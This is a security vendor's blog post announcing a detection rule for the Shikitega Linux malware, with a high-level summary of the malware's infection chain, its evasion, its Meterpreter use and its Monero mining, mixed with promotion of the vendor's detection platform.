A new stealthy Linux malware named Shikitega is on the prowl for its victims. Its operators set up highly evasive attacks, targeting Linux and IoT devices. The Shikitega malware analysis shows that adversaries have adopted a multi-stage infection chain, aiming to achieve full control of the compromised system, exploit vulnerabilities, establish persistence, and drop additional payloads, including a Monero miner.
To assist security practitioners in spotting possible attacks with new Linux malware, Sittikorn Sangrattanapitak has released a rule that detects the execution of the Shikitega script:
This detection has translations for the following SIEM, EDR & XDR platforms: Microsoft Sentinel, Elastic Stack, Splunk, Humio, Sumo Logic, ArcSight, QRadar, FireEye, LogPoint, SentinelOne, Graylog, Regex Grep, CrowdStrike, Microsoft PowerShell, RSA NetWitness, Chronicle Security, Microsoft Defender ATP, Snowflake, Securonix, Apache Kafka ksqlDB, Carbon Black, Open Distro, and AWS OpenSearch.
The rule is aligned with MITRE ATT&CK® framework v.10, addressing the Defense Evasion and Execution tactics with Obfuscated Files or Information (T1027) and System Services (T1569) as the primary techniques.
SOC Prime has revolutionized the way that security teams access threat detection content. We harness the power of collaborative cyber defense, working hard towards facilitating a cross-border “Cyber NATO” to effectively withstand emerging threats. Click the Explore Detections button below to instantly reach dedicated detections and dive into relevant cyber threat contexts without registration directly from the Cyber Threats Search Engine.
Security researchers from AT&T Alien Labs documented the new malware strain earlier this September. We still do not know the vector of initial compromise employed by threat actors behind Shikitega malware. Once the threat is in the system, it fetches malicious payloads from a C2 server and runs them in memory. The malware also deploys Metasploit’s ‘Mettle’ meterpreter on the infected system to elevate privileges and execute a wide array of attacks. Shikitega employs a polymorphic encoder to increase its chances of flying under the radar by evading detection by antivirus solutions.
Join SOC Prime’s Detection as Code platform to unlock access to the world’s largest pool of detection content created by reputable experts in the field. Rest assured that you will not be missing out on any important updates since our SOC experts strive to publish all the latest detections, maintaining a swift response to the latest threats.